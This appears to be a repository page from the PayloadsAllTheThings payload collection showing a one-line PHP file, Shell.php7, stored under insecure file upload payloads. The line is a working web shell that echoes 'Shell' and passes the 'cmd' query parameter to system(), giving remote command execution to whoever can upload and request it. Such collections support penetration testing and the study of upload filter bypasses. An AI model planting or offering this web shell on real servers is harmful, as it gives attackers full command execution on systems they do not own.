PayloadsAllTheThings/Upload insecure files/PHP Extension/Shell.php7
2017-09-27 14:37:07 +02:00

1 line
43 B
Plaintext
Executable File

<?php echo "Shell";system($_GET['cmd']); ?>